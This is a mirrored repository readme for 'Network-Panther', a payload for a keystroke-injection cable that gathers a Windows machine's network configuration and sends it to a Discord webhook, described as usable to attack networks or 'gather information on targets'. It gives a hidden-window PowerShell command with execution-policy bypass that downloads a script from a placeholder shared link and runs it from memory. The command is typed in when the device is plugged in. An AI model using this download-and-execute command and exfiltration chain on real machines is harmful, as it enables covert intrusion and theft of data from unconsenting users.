mirror of https://github.com/hak5/omg-payloads.git
723f290618 | ||
---|---|---|
.. | ||
n.ps1 | ||
payload.txt | ||
readme.md |
readme.md
Table of Contents
Network-Panther
A payload to exfiltrate network configuration. Can be used to further attack a network in a pentest or gather information on targets.
Description
This script will display the network configuration details on the console and also save them to a file in the same directory, then send to a discord webhook.
Getting Started
Dependencies
- DropBox or other file sharing service - Your Shared link for the intended file
- Windows 10,11
Executing program
- Plug in your device
- Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
Contributing
All contributors names will be listed here
atomiczsec I am Jakoby
Version History
- 0.1
- Initial Release